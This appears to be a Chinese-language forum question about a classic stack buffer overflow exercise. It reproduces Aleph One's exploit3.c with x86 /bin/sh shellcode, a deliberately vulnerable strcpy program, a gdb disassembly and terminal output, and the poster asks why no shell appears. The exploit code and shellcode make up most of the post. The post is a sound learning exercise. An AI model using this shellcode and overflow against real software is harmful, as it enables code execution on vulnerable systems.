我试图使缓冲区溢出并运行shellcode以执行bin / sh
对于我们的缓冲区大小,一个好的选择比我们尝试溢出的缓冲区大小大约多100个字节。这会将我们的代码放置在我们尝试溢出的缓冲区的末尾,为NOP留出了很多空间,但是仍然用我们猜测的地址覆盖了返回地址。我们尝试溢出的缓冲区长512个字节,因此我们将使用612。
exploit3.c
#include <stdlib.h> #include <stdio.h> #include <string.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%lx\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash"); }
vulnerable.c
#include <unistd.h> #include <string.h> int main(int argc, char *argv[]) { char xbuff[512]; if(argc >1) strcpy(xbuff, argv[1]); return 0; }
函数主的汇编代码
(gdb) disass main Dump of assembler code for function main: 0x0804840b <+0>: lea 0x4(%esp),%ecx 0x0804840f <+4>: and $0xfffffff0,%esp 0x08048412 <+7>: pushl -0x4(%ecx) 0x08048415 <+10>: push %ebp 0x08048416 <+11>: mov %esp,%ebp 0x08048418 <+13>: push %ecx 0x08048419 <+14>: sub $0x204,%esp 0x0804841f <+20>: mov %ecx,%eax 0x08048421 <+22>: cmpl $0x1,(%eax) 0x08048424 <+25>: jle 0x8048441 <main+54> 0x08048426 <+27>: mov 0x4(%eax),%eax 0x08048429 <+30>: add $0x4,%eax 0x0804842c <+33>: mov (%eax),%eax 0x0804842e <+35>: sub $0x8,%esp 0x08048431 <+38>: push %eax 0x08048432 <+39>: lea -0x208(%ebp),%eax 0x08048438 <+45>: push %eax 0x08048439 <+46>: call 0x80482e0 <strcpy@plt> 0x0804843e <+51>: add $0x10,%esp 0x08048441 <+54>: mov $0x0,%eax 0x08048446 <+59>: mov -0x4(%ebp),%ecx 0x08048449 <+62>: leave 0x0804844a <+63>: lea -0x4(%ecx),%esp 0x0804844d <+66>: ret End of assembler dump.
程序已执行,但未调用bin / sh:
[aleph1]$ ./exploit3 612 Using address: 0xbffffdb4 [aleph1]$ ./vulnerable $EGG [aleph1]$
预期输出是:
[aleph1]$ ./exploit3 612 Using address: 0xbffffdb4 [aleph1]$ ./vulnerable $EGG $ exit [aleph1]$
有什么问题吗?!
第二个问题
:exploit3.c为什么最后运行system(“ / bin / bash”)main()的?...
exploit3
在最后运行一个shell,因为它在这里